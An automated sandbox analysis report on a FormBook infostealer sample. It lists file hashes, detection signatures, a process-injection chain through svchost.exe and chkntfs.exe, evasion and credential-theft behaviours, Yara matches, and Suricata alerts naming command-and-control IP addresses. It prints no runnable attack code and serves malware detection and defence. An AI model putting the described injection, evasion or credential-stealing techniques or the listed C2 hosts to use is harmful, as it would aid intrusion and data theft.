Windows Analysis Report
1162-201.exe

Overview

General Information

Sample name: 1162-201.exe
Analysis ID: 1587354
MD5: 334085b11d8f0dcad01bb1c6414acc91
SHA1: a6c57fab8877a751fc8da1fa0a2a5483f706d43f
SHA256: c4b0ffc82218c157054043b17c17295dc2117b3ddf54f78c6480a0f0f45fb070
Tags: exe, Formbook, Payment, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1162-201.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\1162-201.exe" MD5: 334085B11D8F0DCAD01BB1C6414ACC91)
    • svchost.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\1162-201.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OtAlYRopPg.exe (PID: 6044 cmdline: "C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 4976 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • OtAlYRopPg.exe (PID: 6728 cmdline: "C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\1162-201.exe", CommandLine: "C:\Users\user\Desktop\1162-201.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1162-201.exe", ParentImage: C:\Users\user\Desktop\1162-201.exe, ParentProcessId: 5948, ParentProcessName: 1162-201.exe, ProcessCommandLine: "C:\Users\user\Desktop\1162-201.exe", ProcessId: 5808, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\1162-201.exe", CommandLine: "C:\Users\user\Desktop\1162-201.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1162-201.exe", ParentImage: C:\Users\user\Desktop\1162-201.exe, ParentProcessId: 5948, ParentProcessName: 1162-201.exe, ProcessCommandLine: "C:\Users\user\Desktop\1162-201.exe", ProcessId: 5808, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T09:09:55.087538+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50026 | 172.67.148.216 | 80 | TCP
2025-01-10T09:10:56.986600+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49982 | 172.65.235.97 | 80 | TCP
2025-01-10T09:11:20.332386+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49987 | 192.64.119.109 | 80 | TCP
2025-01-10T09:11:34.316833+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49991 | 188.114.96.3 | 80 | TCP
2025-01-10T09:11:48.625013+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49995 | 47.83.1.90 | 80 | TCP
2025-01-10T09:12:19.334363+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50000 | 162.0.236.169 | 80 | TCP
2025-01-10T09:12:33.532223+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 192.186.58.31 | 80 | TCP
2025-01-10T09:12:48.218716+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50008 | 104.21.64.1 | 80 | TCP
2025-01-10T09:13:18.082264+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50014 | 76.223.67.189 | 80 | TCP
2025-01-10T09:13:32.878782+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50018 | 103.247.11.204 | 80 | TCP
2025-01-10T09:13:46.617733+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50022 | 136.243.64.147 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T09:09:55.087538+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 172.67.148.216 | 80 | TCP
2025-01-10T09:10:56.986600+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49982 | 172.65.235.97 | 80 | TCP
2025-01-10T09:11:20.332386+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 192.64.119.109 | 80 | TCP
2025-01-10T09:11:34.316833+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 188.114.96.3 | 80 | TCP
2025-01-10T09:11:48.625013+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 47.83.1.90 | 80 | TCP
2025-01-10T09:12:19.334363+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50000 | 162.0.236.169 | 80 | TCP
2025-01-10T09:12:33.532223+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 192.186.58.31 | 80 | TCP
2025-01-10T09:12:48.218716+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 104.21.64.1 | 80 | TCP
2025-01-10T09:13:18.082264+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 76.223.67.189 | 80 | TCP
2025-01-10T09:13:32.878782+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50018 | 103.247.11.204 | 80 | TCP
2025-01-10T09:13:46.617733+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 136.243.64.147 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T09:11:12.568089+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49983 | 192.64.119.109 | 80 | TCP
2025-01-10T09:11:15.182909+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49985 | 192.64.119.109 | 80 | TCP
2025-01-10T09:11:17.715087+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49986 | 192.64.119.109 | 80 | TCP
2025-01-10T09:11:26.645856+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 188.114.96.3 | 80 | TCP
2025-01-10T09:11:29.180718+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 188.114.96.3 | 80 | TCP
2025-01-10T09:11:31.729322+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 188.114.96.3 | 80 | TCP
2025-01-10T09:11:40.868995+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 47.83.1.90 | 80 | TCP
2025-01-10T09:11:43.415794+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 47.83.1.90 | 80 | TCP
2025-01-10T09:11:45.976305+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 47.83.1.90 | 80 | TCP
2025-01-10T09:12:11.142217+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 162.0.236.169 | 80 | TCP
2025-01-10T09:12:14.211745+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 162.0.236.169 | 80 | TCP
2025-01-10T09:12:16.804868+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 162.0.236.169 | 80 | TCP
2025-01-10T09:12:25.801396+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50001 | 192.186.58.31 | 80 | TCP
2025-01-10T09:12:28.347277+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 192.186.58.31 | 80 | TCP
2025-01-10T09:12:30.919683+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 192.186.58.31 | 80 | TCP
2025-01-10T09:12:40.589250+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 104.21.64.1 | 80 | TCP
2025-01-10T09:12:43.099257+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 104.21.64.1 | 80 | TCP
2025-01-10T09:12:45.679534+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 104.21.64.1 | 80 | TCP
2025-01-10T09:13:10.285311+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 76.223.67.189 | 80 | TCP
2025-01-10T09:13:12.831793+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 76.223.67.189 | 80 | TCP
2025-01-10T09:13:15.396028+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 76.223.67.189 | 80 | TCP
2025-01-10T09:13:24.945983+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 103.247.11.204 | 80 | TCP
2025-01-10T09:13:27.495857+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 103.247.11.204 | 80 | TCP
2025-01-10T09:13:30.418691+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50017 | 103.247.11.204 | 80 | TCP
2025-01-10T09:13:38.849752+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50019 | 136.243.64.147 | 80 | TCP
2025-01-10T09:13:41.488788+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50020 | 136.243.64.147 | 80 | TCP
2025-01-10T09:13:44.064503+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 136.243.64.147 | 80 | TCP
2025-01-10T09:14:01.430656+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 172.67.148.216 | 80 | TCP
2025-01-10T09:14:04.048534+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50024 | 172.67.148.216 | 80 | TCP
2025-01-10T09:14:06.587029+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 172.67.148.216 | 80 | TCP

                AV Detection

Source: 1162-201.exe, Avira: detected
Source: 1162-201.exe, Virustotal: Detection: 35%
Source: 1162-201.exe, ReversingLabs: Detection: 57%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1162-201.exe, Joe Sandbox ML: detected
Source: 1162-201.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OtAlYRopPg.exe, 00000005.00000000.2502672174.000000000010E000.00000002.00000001.01000000.00000005.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645298930.000000000010E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C8D076
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C5C2A2 FindFirstFileExW, 0_2_00C5C2A2
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C8D3A9
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C99642
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C9979D
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C968EE FindFirstFileW,FindClose, 0_2_00C968EE
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C9698F
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C8DBBE
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C99B2B
Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C95C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C95C97
Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 6_2_0249CFA0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0249CFA0
Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 4x nop then xor eax, eax, 6_2_02489FB0
Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 4x nop then pop edi, 6_2_0248EB14
Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_042A04DF

                Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 162.0.236.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 162.0.236.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 162.0.236.169:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 136.243.64.147:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 192.64.119.109:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49982 -> 172.65.235.97:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 76.223.67.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 192.186.58.31:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50014 -> 76.223.67.189:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 192.186.58.31:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 76.223.67.189:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 192.186.58.31:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 162.0.236.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 192.64.119.109:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 162.0.236.169:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49982 -> 172.65.235.97:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 192.64.119.109:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 192.186.58.31:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 103.247.11.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 76.223.67.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 76.223.67.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 103.247.11.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 192.64.119.109:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 192.64.119.109:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 172.67.148.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50018 -> 103.247.11.204:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 103.247.11.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 172.67.148.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 136.243.64.147:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 136.243.64.147:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 172.67.148.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 103.247.11.204:80
